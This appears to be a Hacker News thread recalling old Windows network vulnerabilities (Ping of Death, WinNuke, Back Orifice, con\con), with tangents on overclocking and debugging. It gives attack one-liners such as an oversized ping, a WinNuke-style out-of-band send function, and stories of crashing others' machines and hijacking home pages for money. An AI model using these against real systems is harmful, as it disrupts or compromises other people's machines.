I built a port checker way back to determine if services were up. It crashed half the company simply by opening a few TCP ports on their machines.
Ridiculous days :)
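For the curious, a port check of that kind is just a TCP connect with a timeout. A minimal sketch (host and port arguments are illustrative; nothing here should crash a modern stack):

```python
import socket

def is_port_open(host, port, timeout=1.0):
    """Try a single TCP connection; open the socket, then close it right away."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Connection refused, timed out, unreachable, etc.
        return False
```

The fragile machines of that era could fall over from even this single polite connect, let alone a scan across a port range.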
I also remember SMB vulnerabilities that stayed unpatched for years on some machines. That was already when Metasploit existed, so you could inject VNC into most Windows hosts on the local network with just a few commands. These days at least the patching is super fast.
Even into the late 90s and early 2000s, modems (including ADSL) didn't come with a router; you had to establish a PPPoE connection from your computer, which meant your home machine was directly on the WAN with no firewall protection.
I can't remember which version of Windows it was, but it must have been 98 or ME: when you first connected it to the internet, you had to rush to download and install a patch before one of these exploits crashed it.
I never encountered any of this, except that one roommate liked to brag about his expensive win 9x box, and me and another roommate would take turns using our junky linux and nt desktops to “pause” his machine with “ping -f”, usually in the middle of a lecture about how amazingly fast it was.
Later, we had an openbsd router running on an old 386 that we jammed a few old 10MBit 3com cards into (later, Linux, plus $20 ne2000’s).
Those things had 100% uptime other than power outages, ne2000 swaps, and the time I unplugged it after 50 gallons of water ran through it (stayed up, worked fine after I made a new copy of the soggy boot floppy).
Later we ended up with some shitty belkin router, etc. “Unplug it and plug it back in? Really?”
Eventually, I got a WRT54GL (emphasis on the L) which worked for a few years.
Now I’m back on OpenBSD. The only software downtime is due to PG&E power cycling it 100 times, and fsck expecting me to send a “y” over the serial port one of those times. Now it is double battery backed.
It works, but I’m living in fear of the day my PC Engines APU board finally gives up the ghost.
Also, sometimes our starlink’s linux cpu hangs. You’d think they could get that right. It’s not like it’s as hard as building a car, launching rockets, or operating a network that’s used for public safety announcements.
> Even into the late 90s and early 2000s, modems (including ADSL) didn't come with a router; you had to establish a PPPoE connection from your computer, which meant your home machine was directly on the WAN with no firewall protection.
Even today, modems don't always come with a router. In fact, I like them that way :).
IIRC, the problem in the late 90s/early 2000s was that routers were thought of as only necessary to get multiple computers online, and it was pretty common for households to own only a single desktop. There wasn't enough security consciousness earned through repeated failure, so it "made sense" to directly connect consumer machines to the internet.
We actually had a LAN years before we had broadband, and I set up a PC running Linux as a router to share our 33.6 modem with the household. But before that? The PC dialed directly into the ISP and got a publicly-routable IP.
IIRC Windows XP up to SP2 was vulnerable to this. Basically if you ran the install with the DSL modem attached, your PC was compromised even before the end of setup.
When W32/Blaster[0] came out I worked at a small ISP doing tech support and computer repair. A tech and I imaged an old box we had in the corner with a clean XP, assigned it a static IP in our /24, plugged it in and started a stopwatch. It didn’t even make it two minutes before it was infected.
I was working for a small ISP in that time frame and that's when we started blocking incoming windows ports. And yea, it was annoying for the few techie types that tried to run SMB and could actually protect their stuff.
For the other 99.9% of users, it protected them and us.
Yeah Blaster is one of the few worms I've ever (knowingly) been infected with. As you say, it was literally less than a minute or two between connecting an unpatched box and getting it.
That is really unpleasant. Engineers worked, companies worked, and volunteers also worked to make the modern Internet, and then selfish, thieving, control-oriented jerks filled it with Windows virus activity to play cheap stealing tricks on unsuspecting people. And you call it "the Internet"... it had nothing to do with "the Internet", and everything to do with the cheap and aggressive culture of BS around Windows at that time.
It would be more fair to criticize the corporate culture at Microsoft in the 90s that led to this situation.
They simply didn't really care. If another OS was dominant, it is easy to argue that fundamental security issues could have been addressed in a better fashion, if management wanted it to be so.
To wit, this is the same era of computing that spawned OpenBSD. You can't say with a straight face that OpenBSD would have been brought down by oversized ping packets or be allowed to accept traffic out of the box like Windows was.
> I can't remember which version of Windows it was, but it must have been 98 or ME: when you first connected it to the internet, you had to rush to download and install a patch before one of these exploits crashed it.
Much more than that. With Windows 95, you could send an illegal ICMP packet with a simple "ping.exe -l 65510 victim.host.ip.address". Your Windows 95 machine might crash or misbehave after that, but not always.
The receiving end, the destination IP, on the other hand... These would panic, crash, dump, hang or reboot: Windows, MacOS, Netware, AIX, Linux, DEC Unix, Nextstep, OpenVMS, SCO Unix, HP-UX, Convex OS, Solaris.
It was very funny in the very first hours, the little toy Win95 machines obliterating all those big, expensive Unix servers on the network.
That was the precise moment when we started filtering ICMP echo on the routers. Hardly anyone did this before.
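The arithmetic behind that magic 65510 is simple, and worth spelling out. IPv4's total-length field is 16 bits, so a datagram may be at most 65535 bytes; add the ICMP and IP headers to that payload and the reassembled packet overflows the limit, which sent many reassembly implementations writing past their buffer (the classic "Ping of Death"):

```python
# Header sizes per the IPv4 and ICMP formats; the 65535 cap comes from
# the 16-bit total-length field in the IP header.
MAX_IP_DATAGRAM = 65535
ICMP_HEADER = 8
IP_HEADER = 20

def reassembled_size(payload):
    """Size of the full datagram the victim must reassemble."""
    return payload + ICMP_HEADER + IP_HEADER
```

With a payload of 65510, the reassembled datagram comes to 65538 bytes, three past the maximum; the largest *legal* ping payload is 65507.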
Earlier versions of Windows (98? 95?) also used to share things like drives (C$, D$) and printers with the dial-up connection by default.
I remember connecting to a printer of a classmate over the internet and printing a page, to his surprise. All you needed was the IP, which was trivial to get from ICQ, back in the day.
There was a time when you could SMB mount shares from servers at MS over the public internet (and e.g. do things like download alphas and betas that were not visible on the ftp server).
I remember early Bitcoin exchanges that had everything stolen because they left all of their unencrypted private keys on SMB shares that were left visible to the Internet. IIRC this is what finally took down MtGox, almost 20 years after the release of Windows 95. Some people never learn.
What was more fun was when the spammers figured out 'net send'. I showed it to one guy I worked with, and that thing had a nasty bug: if you got one of the parameters wrong, it would send the message to every computer on the domain. He had to explain to the top guys why they had funny messages on their screens.
When I was at university, without a fully developed frontal lobe yet, I thought it was a great idea to test this in the lab.
Ended up creating a "battleship"-like game. Two people, each trying to crash the other's machine. Since the IPs were randomly assigned by DHCP and for some inexplicable reason changed frequently (every day or so), we would be trying to guess what the other machine's IP was.
Given how they were physically arranged, we were able to see the machines blue screening (but not always fully crashing).
Of course, there was a lot of collateral damage, as some machines were in use by people who weren't part of the 'game'. Thankfully, most of the time they didn't fully crash. Most of the time.
Ah, the good ole days of "hey what's your IP address?" followed by typing those four magical numbers into Winnuke and then watching a person just drop off ICQ. Still makes me chuckle. That worked for years.
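Mechanically, WinNuke was tiny: open a TCP connection to NetBIOS port 139 and send data flagged "out of band" (TCP urgent data); unpatched Windows 95 mishandled the urgent pointer and blue-screened. A sketch of the send side (host and port here are placeholders, and nothing about the send itself is Windows-specific or harmful to a modern stack):

```python
import socket

def send_oob(host, port, data=b"nuke"):
    """Send TCP data with the last byte marked urgent (URG flag set)."""
    with socket.create_connection((host, port), timeout=2) as s:
        # MSG_OOB marks the final byte as "out of band" via the urgent pointer;
        # that urgent byte is what tripped up the Win95 TCP stack.
        s.send(data, socket.MSG_OOB)
```

On the receiving side, a well-behaved stack just delivers the urgent byte separately (or inline, if asked); Windows 95's failure to do so cleanly was the whole exploit.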
Oh, I remember those times. There was a guy in high school, two years younger, who one day showed me that he had written a C implementation of WinNuke on the school Unix server, and he was then crashing Windows PCs in the lab for fun.
He was a really smart guy and AFAIK he's been working at Google for a few years now (maybe he's on HN even?)
I remember when CdC released Back Orifice to remotely control Windows machines, ejecting the CDROM and such [1]. We've really come a long way; 0-days now go for 20 million dollars [2].
I was managing a few labs full of machines used for training on NT4, which meant I was frequently re-imaging and could use an effective remote-control capability. Back Orifice was, at the time, the absolute best remote admin solution available for free. I could deploy it in the image and then use it to kick off the reimage process, reboot, log out a student, or monitor their screen from the teacher's desk to share on the attached TV. It really was a handy tool for remote admin tasks.
It could also disable certain keys on the victim's keyboard. I did that in the office a bunch; it was hilarious watching co-workers who had no idea what was going on. Perfect for a Monday morning.
I may or may not have known someone who wrote a shell script with the linux BO client to reset Windows machines' home pages to a porn site that paid a dollar for every unique clickthrough in IP ranges that were in specific foreign countries.
This person might have earned several hundred dollars each month for several months afterward. But opening their cdrom tray could have been fun too. He probably wishes he had thought of that.
My favorite 'thing' for historical Windows was that accessing "C:\con\con" was an instant BSOD (even over file sharing, or even via an image URL pointing to "file://C:/con/con").
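The reason the path worked at all: CON, PRN, AUX, NUL, COM1-9, and LPT1-9 are DOS device names reserved in *every* directory, so "C:\con\con" names the console device twice, and a Win9x bug in that double device lookup caused the crash. A sketch of the reservation rule (my own simplified check, not the actual Windows parser):

```python
# DOS device names, reserved in every directory on Windows.
RESERVED = {"CON", "PRN", "AUX", "NUL"} \
    | {f"COM{i}" for i in range(1, 10)} \
    | {f"LPT{i}" for i in range(1, 10)}

def has_reserved_component(path):
    """True if any path component names a DOS device.

    Extensions don't help: "con.txt" still names the console device."""
    parts = path.replace("\\", "/").split("/")
    return any(p.split(".")[0].upper() in RESERVED for p in parts if p)
```

This is also why you still can't create a file called `con` or `nul.jpg` on Windows today; only the double-device crash was fixed.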
I had my Mac exposed on the public Internet around 2021/22, and I expected to be hacked instantly, but nothing actually happened. Times really have changed.
The feeling of being able to chat with friends over nc was pretty powerful, though.
Ah, the retro-computing rabbit hole. Harmlessly divorced from any real-world consequences, but truly satisfying nonetheless. A real honey trap for nerds.
I look back at the computers before my time - the PETs and such - and I think it'd be fun to play with them. Or maybe an old IRIX box.
But a 486?? That brings back too many memories of blue screens and waiting forever because we couldn't afford memory and were thus swapping to disk. Still too soon for me, I suppose.
I went back and booted my old Indigo from back in the day, as well as an old Sun 3/80 recently. It wasn't as great as I expected it to be, and all the annoyances from when I used to do actual work on them came flooding back quickly. Nostalgia is a heck of a drug.
I still reserve the PET as a perfect machine because 1) it's the first machine I really used as a kid, and 2) I haven't yet been foolish enough to try and go back to one in over 40 years now.
Unsurprisingly, the mathematician ignores real-world problems: problems we understand but can't be bothered to solve (e.g. hunger, poverty, climate, etc.).
If we don't have a viable solution, do we really understand the problem?
Not being facetious. Saying we know that people are hungry is like saying my computer doesn't do the thing I want it to do. The difficult part is (in both cases) solving the problem. And that INCLUDES the pesky "why can't society just agree to do the good thing" part.
Poverty is also not a problem, just a definition (the bottom 10-20% of producers).
Climate is also not a problem, just the reality of humans paper-clipping finite resources. Algae did the same thing when they took CO2 from 99% of the atmosphere down to less than 1%. Now it's the algae left arm wrestling the human left.
They are all easy to solve if it weren’t for social inertia though. It’s not like there is a fundamental law requiring poverty to exist, we know exactly what is causing these issues and have the resources to deal with them. We just don’t want the inconvenience of it.
Well, once the bug is identified, yes. I wonder how you find a bug like that; I guess you keep reading the disassembly of the trapping code until you find the problem. I don't think he could have used QEMU or some other form of debugging.
"NTOSKRNL.EXE + debug symbols + IDA helped me understand how the remote break-in is supposed to work. I knew that something in the remote break-in code path before the first debug packet is sent is going to reboot my machine. So I patched "JMP SHORT $" instructions into the relevant code-path. If I placed it before the crash point, the machine hangs. If I placed it after the crash point, the machine reboots. This allowed me to "bisect" where the crash is happening."
-----
Here is a ChatGPT breakdown of the comment:
NTOSKRNL.EXE: This is the kernel of the Windows NT operating system. When people refer to the "Windows kernel," they're typically talking about this executable.
debug symbols: These are additional pieces of data that describe the internal structures and functions within a binary (like an EXE or DLL). They make it much easier to understand what's going on when analyzing or debugging the binary.
IDA: IDA (Interactive DisAssembler) is a popular disassembler and debugger used by security researchers and reverse engineers to analyze binaries.
how the remote break-in is supposed to work: It sounds like the commenter is trying to understand how a specific feature or vulnerability related to remote debugging (or "remote break-in") operates.
something in the remote break-in code path before the first debug packet is sent: There's a sequence of events or a code path in the kernel related to the remote debugging feature. The problem seems to manifest before the first debug packet is sent over the network.
JMP SHORT $: This is an assembly instruction. The JMP instruction is used to jump to another part of the code. SHORT refers to a short jump, meaning the jump target is relatively close. The $ symbol refers to the current address of the instruction, so "JMP SHORT $" will cause the program to jump to itself, effectively causing an infinite loop.
patched "JMP SHORT $" instructions into the relevant code-path: By inserting this instruction at various points in the code, the commenter created intentional hangs in the system. This helped isolate where the crash occurs.
bisect: This term comes from the world of debugging and means to divide the code into smaller parts to determine where a problem is. In this context, the commenter is using the hang (from the JMP instruction) as an indicator. If they inserted the JMP instruction and the system hangs, it means the crash hasn't occurred yet. If they inserted the JMP instruction and the system reboots, it means the crash already happened. By moving the JMP instruction around, they can get closer to the exact point of the crash.
In essence, the commenter used a mix of reverse engineering tools and clever debugging tricks to narrow down where a crash was occurring in the Windows NT 3.1 kernel when using a remote debugging feature.
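The hang-vs-reboot trick is an ordinary binary search over instruction addresses. A sketch in Python, where `probe` stands in for "plant a `JMP SHORT $` at position i and watch what the machine does":

```python
def bisect_crash(probe, lo, hi):
    """Binary-search for the crash point.

    probe(i) returns "hang" if the planted jump at i stops execution before
    the crash (machine spins forever), or "reboot" if the crash already
    happened by the time execution reaches i.
    Precondition: probe(lo) == "hang" and probe(hi) == "reboot".
    """
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if probe(mid) == "hang":
            lo = mid   # crash point is after mid
        else:
            hi = mid   # crash point is at or before mid
    return hi  # first position where the patch no longer prevents the crash
```

Each probe costs a full patch-and-reboot cycle, but the search needs only log2(N) probes, which is what makes the technique practical by hand.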
Not sure why this is downvoted, the comment is on point. Is it because it is partly gpt-generated content?
I wonder if patching memory worked in the debugger; if not, this would have to be done by manually editing the kernel file with IDA or something and rebooting the machine. But either way, this is a good way to find the problem.
If you don't want to be seeing ChatGPT generated content here, you should downvote it to discourage the poster from doing so. This is a perfect use of a downvote IMHO.
If you don't mind or care enough, obviously don't downvote, and if you love it, upvote it. That's how we get our community to develop some shared standards of communication.
FWIW, if someone wants ChatGPT content, they can just go to ChatGPT too.
True, although in this case the ChatGPT explanation seems to be mostly accurate.
The one dubious point is the definition of "bisect". The definition is completely accurate in this context. But the sentence after the definition starts with "In this context,", implying that the definition itself should be relatively context-independent. Yet the term "bisect" in programming is more commonly used to refer to something slightly different: dividing some code's commit history into parts, not the code itself.
Also, several of the explanations are wordy and uninsightful, though not false.
…Admittedly, this is all beside the point. ChatGPT output carries a high risk of being inaccurate, so even if it's accurate in some specific case, readers have no way of knowing that. Which means that you shouldn't post ChatGPT output unless you can personally vouch for its accuracy, but in that case why use ChatGPT at all? Still, in this case I'll retrospectively vouch for it.
I added the ChatGPT explanation after the fact because I thought some readers might not have the background to understand the original explanation and I could vouch for its accuracy.
Honestly didn't expect it to cause such a backlash in this forum...
SO's auto collapsing of comments just makes no sense every time I see it. It isn't hiding the lowest-voted ones, and it isn't hiding the newest or oldest ones. It feels random (and unnecessary).
IMO they should just add paging rather than hiding, if space is the concern.
FWIW, these slotket adapters (for compatibility on the right boards, usually Abit, Asus, and maybe even MSI back then) had REAL overclocking abilities: how fast is your RAM, and what clock settings can the motherboard get away with in terms of multipliers? This was the earlyish days of overclocking - Celerons and Pentium IIs.
I once had a Celeron 600 in one adapter for compatibility, and that was in a Slot 1 to Socket 370 adapter, something comparable to [1], happily chugging along at 1.2GHz. Maybe I even got that bad boy up to 1.4GHz, under Windows ME of all OSes, before I eventually fried that CPU.
Some recent processors have an even more ridiculous curve: you can get 80% of the performance at half the power, or half the performance at a quarter of the power. Recent AMD/Intel processors have the habit of pushing the frequency to the thermal envelope (in other words, overclocked to the extreme by default) instead of running a sane frequency with sane power usage.
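The rough physics behind that curve: dynamic power scales as P ≈ C·f·V², and voltage has to rise roughly linearly with frequency, giving the familiar P ∝ f³ rule of thumb. The cubic is only an approximation (real parts have static leakage and discrete voltage steps), but it shows why backing off the clock slightly saves so much power:

```python
def relative_power(relative_freq):
    """Dynamic power relative to the full-speed baseline, under the
    rule-of-thumb assumption that voltage scales linearly with frequency,
    so P ~ f * V^2 ~ f^3."""
    return relative_freq ** 3
```

Running at 80% of the clock lands near half the power, matching the comment above; the cube even predicts half the performance at an *eighth* of the power, though leakage keeps real chips from doing quite that well.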
Actually, that kind of thing makes a lot of sense to me and I think it's a good idea. I've read so many stories about hardware with bogus ACPI and EDID data causing problems with Linux support over the years. It seems to me that Linux tends to treat hardware information as always correct, whereas Windows is far less trusting and has information about device-specific bugs. The result is that while things tend to work out-of-the-box on Windows, they require far more tinkering on Linux.
Troubleshooting was different when we came up. Just your wits and maybe some gurus you could call on a landline as backup. No fancy internet with tons of answers of varying degrees of usefulness.
As long as you had access to a library... When I was 14 or so, I used the MS-DOS DEBUG program to step through an executable that changed blinking to high-intensity backgrounds in text mode. After an hour or so I found the magic BIOS call... which of course was documented in the technical manual I found in the library a year later (because new school = new library with more books).
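For context on what that call toggles: in the PC text-mode attribute byte, bit 7 means "blink" by default, but the BIOS (INT 10h with AX=1003h, BL=0) can repurpose it as background intensity, unlocking all 16 background colors. A sketch of the attribute layout (my own decoder, purely illustrative):

```python
def decode_attr(attr, blink_mode=True):
    """Decode a text-mode attribute byte.

    Low nibble: foreground color (0-15). High nibble: background, where
    bit 7 is either "blink" (default) or a fourth background-intensity bit,
    depending on how the BIOS blink/intensity toggle is set."""
    fg = attr & 0x0F
    if blink_mode:
        return {"fg": fg, "bg": (attr >> 4) & 0x07, "blink": bool(attr & 0x80)}
    return {"fg": fg, "bg": (attr >> 4) & 0x0F, "blink": False}
```

The same byte thus means "blinking white on blue" in one mode and "white on light blue" in the other, which is exactly the effect that executable produced.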
When I was a kid I used to have this Charles Petzold book that I learned this stuff from, it was basically my Bible. I don't have it anymore, I wish I could remember what it was. People recommend Code a lot, but I don't think that was it.
Edit: it wasn't Charles Petzold at all, it was DOS Power Tools by Paul Somerson
Books were just knowledge. Debugging was skill.
At a certain point in knowledge-gain you develop good skill, and after that point you don't need books anymore. Maybe from time to time. I still have a printed SuSE 6 manual. I can't see it in the cellar, but it was HUUGE.
This is just macho bravado, and it can be fun, but it's definitely not the most efficient use of someone's time.
If you have access, why would you debug machine code without using the reference manuals for the particular processor, OS, and whatever else you're dealing with? You could spend hours chasing an "impossible" problem that could easily be found in the errata for a given stepping.
But you still need some critical amount of knowledge from somewhere. I wish I'd at least known that something like assembler existed when I was 12. I naively tried to make some demos, but BASIC was not adequate, so I considered the demoscene "magic".
Luckily, as a single individual you only need one (or at most a handful) of (programming) jobs at a time. So you don't need to worry about the vast majority of jobs.